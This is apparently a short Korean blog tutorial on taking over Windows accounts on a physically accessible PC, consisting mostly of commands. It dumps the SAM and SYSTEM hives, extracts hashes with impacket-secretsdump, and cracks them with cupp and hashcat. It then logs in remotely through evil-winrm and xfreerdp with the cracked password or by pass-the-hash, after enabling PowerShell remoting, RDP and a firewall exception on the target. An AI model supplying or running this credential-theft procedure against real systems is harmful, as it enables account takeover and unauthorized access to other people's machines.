How to Get Windows Account
How to Get Windows Account
아래 방법은 target pc에 직접 접근 가능할때 사용할수 있는 방법이다.
cmd.exe 를 관리자 권한으로 실행 시키자.
reg save HKLM\sam ./sam.save
reg save HKLM\system ./system.save
저장된 sam.save 와 system.save 를 칼리 리눅스로 가져가자.
칼리 리눅스에서 다음 명령어를 실행하자.
impacket-secretsdump -sam sam.save -system system.save LOCAL
화면에 사용자 비번과 hash 값이 출력된다.
hash 값을 file 에 저장하자.
nano hashes.txt
패스워드 사전파일을 만들어주는 cupp를 아래 그림처럼 설치하자.
cupp -i
hashcat -m 1000 hashes.txt yoon.txt
hashcat -m 1000 hashes.txt yoon.txt --show
계정을 탈취하면 다음과 같은 공격을 생각해 볼수 있다.
evil-winrm -i 192.168.50.11 -u netwa -p password
evil-winrm 으로 접속하려면 target pc 에 설정을 해야 한다.
Set-NetConnectionProfile -NetworkCategory Private
Enable-PSRemoting -Force
위에 명령은 power shell 관리자 권한이 필요하다. 참고로 윈도우 방화벽은 관계가 없다.
rdp 를 이용할수도 있다.
xfreerdp /v:192.168.50.11 /u:netwa /p:password
rdp는 윈도우 에서 원격 연결 허용을 하고 방화벽 예외를 적용해야 한다.
아래는 rdp를 허용 하는 명령어 이다.
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -Name "fDenyTSConnections" -Value 0
아래는 방화벽 규칙을 추가하는 명령어 이다.
New-NetFirewallRule -DisplayName "Remote Desktop" -Direction Inbound -Action Allow -Protocol TCP -LocalPort 3389
만약 password 크랙킹에 실패하면 다음과 같이 해쉬값을 이용하는 방법도 있다.
evil-winrm -i 192.168.50.11 -u netwa -H 3661e40638bb6603f1d22ff18dde88d4
xfreerdp /v:192.168.50.11 /u:netwa /pth:3661e40638bb6603f1d22ff18dde88d4
참고로 xfreerdp는 evil-winrm와 달리 사용자 비번이 설정되 있지 않은 상태에서 빈 해쉬값으로 로그인 하면 연결이 안된다.